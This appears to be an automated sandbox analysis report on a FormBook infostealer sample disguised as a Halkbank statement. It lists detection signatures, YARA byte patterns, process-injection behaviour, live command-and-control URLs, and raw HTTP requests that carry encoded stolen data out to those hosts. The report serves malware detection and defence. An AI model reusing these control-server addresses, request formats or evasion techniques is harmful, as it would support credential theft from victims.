Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe

Overview

General Information

Sample Name:Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
Analysis ID:813159
MD5:f4caa699ad1907e12e6c5809d1a9af5e
SHA1:e1c7ee1bce916811e26d759770636a84bc760c3b
SHA256:e14890d40be2216c014475cac45debe0d23a1e6eb333908c814034b1df73b73d
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe (PID: 3184 cmdline: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe MD5: F4CAA699AD1907E12E6C5809D1A9AF5E)
    • jmaxbgpy.exe (PID: 5096 cmdline: "C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe" C:\Users\user\AppData\Local\Temp\jvzvjhm.oj MD5: 80B16EC75046C2265A49A9AD7196B5BD)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • jmaxbgpy.exe (PID: 3300 cmdline: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exe MD5: 80B16EC75046C2265A49A9AD7196B5BD)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • systray.exe (PID: 4296 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 1373D481BE4C8A6E5F5030D2FB0A0C68)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x18105:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17ba1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x18207:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1837f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x16dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1de77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ee2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x1f0d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x18307:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      Click to see the 13 entries
      SourceRuleDescriptionAuthorStrings
      3.2.jmaxbgpy.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        3.2.jmaxbgpy.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x20083:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xbe02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x192ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.jmaxbgpy.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x190b8:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x18b54:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x191ba:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x19332:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xb9cd:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17d9f:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1ee2a:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1fddd:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.jmaxbgpy.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          3.2.jmaxbgpy.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x20e83:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xcc02:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x1a0ba:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          Click to see the 1 entries
          No Sigma rule has matched
          Timestamp:192.168.2.58.8.8.861452532023883 02/22/23-09:04:03.176167
          SID:2023883
          Source Port:61452
          Destination Port:53
          Protocol:UDP
          Classtype:Potentially Bad Traffic

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeVirustotal: Detection: 40%Perma Link
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeReversingLabs: Detection: 33%
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.jmaxbgpy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.576616910.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576194364.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374768010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.576555861.00000000028D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374817426.0000000000470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.374851183.00000000004A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: http://www.energybig.xyz/ghii/?Azs=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==&OGpK-=bVTY_sdT7Avira URL Cloud: Label: malware
          Source: http://www.7dkjhk.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloud/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyzAvira URL Cloud: Label: malware
          Source: http://www.ladybillplanet.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.hubyazilim.com/ghii/Avira URL Cloud: Label: malware
          Source: http://www.octohoki.net/ghii/Avira URL Cloud: Label: malware
          Source: http://www.octohoki.netAvira URL Cloud: Label: malware
          Source: http://www.genuineinsights.cloudAvira URL Cloud: Label: phishing
          Source: http://www.wenzid4.top/ghii/Avira URL Cloud: Label: malware
          Source: http://www.energybig.xyz/ghii/Avira URL Cloud: Label: malware
          Source: http://www.wenzid4.top/ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7Avira URL Cloud: Label: malware
          Source: www.energybig.xyzVirustotal: Detection: 7%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\jmaxbgpy.exeReversingLabs: Detection: 23%
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeJoe Sandbox ML: detected
          Source: 1.2.jmaxbgpy.exe.8c0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.jmaxbgpy.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: jmaxbgpy.exe, 00000001.00000003.325098784.000000001A0F0000.00000004.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000001.00000003.317555624.00000000021A0000.00000004.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.325733706.0000000000760000.00000004.00000020.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000BAF000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.328207996.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.000000000456F000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.0000000004450000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000003.376509769.00000000042BB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000003.374772234.000000000411C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: jmaxbgpy.exe, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000A90000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.325733706.0000000000760000.00000004.00000020.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000002.375074700.0000000000BAF000.00000040.00001000.00020000.00000000.sdmp, jmaxbgpy.exe, 00000003.00000003.328207996.00000000008FC000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.000000000456F000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000002.576795958.0000000004450000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000005.00000003.376509769.00000000042BB000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000005.00000003.374772234.000000000411C000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

          Networking

          barindex
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.5:61452 -> 8.8.8.8:53
          Source: C:\Windows\explorer.exeDNS query: www.energybig.xyz
          Source: Joe Sandbox ViewASN Name: PEGTECHINCUS PEGTECHINCUS
          Source: Joe Sandbox ViewASN Name: VODAFONE_ROCharlesdeGaullenr15RO VODAFONE_ROCharlesdeGaullenr15RO
          Source: global trafficHTTP traffic detected: GET /ghii/?Azs=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF3LCH1xNv1NtM5EA==&OGpK-=bVTY_sdT7 HTTP/1.1Host: www.wenzid4.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ghii/?Azs=Hsu0eFbPaPXvQj1driY9Qb+UxIEGydZDMi24Zx/KBNJzrILAD6eOCtsvvO79CgG5LYmF38wKy0LUujLv+r7gh4V4lR0M0OxnEw==&OGpK-=bVTY_sdT7 HTTP/1.1Host: www.energybig.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 107.148.8.96 107.148.8.96
          Source: Joe Sandbox ViewIP Address: 194.102.227.30 194.102.227.30
          Source: global trafficHTTP traffic detected: POST /ghii/ HTTP/1.1Host: www.energybig.xyzConnection: closeContent-Length: 185Cache-Control: no-cacheOrigin: http://www.energybig.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energybig.xyz/ghii/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 41 7a 73 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 28 69 52 73 42 59 28 32 49 36 46 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: Azs=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4(iRsBY(2I6FODv6UUA).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 22 Feb 2023 08:02:10 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Feb 2023 08:05:10 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 22 Feb 2023 08:05:13 GMTServer: ApacheContent-Length: 5278Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39
          Source: Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7dkjhk.com/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.assilajamiart.com/ghii/
          Source: explorer.exe, 00000004.00000000.332767544.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.576238751.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bemmulher.online/ghii/
          Source: explorer.exe, 00000004.00000002.588077771.000000000ED50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.538156405.000000000ED56000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net
          Source: explorer.exe, 00000004.00000003.535372886.000000000ED56000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.cutgang.net/ghii/
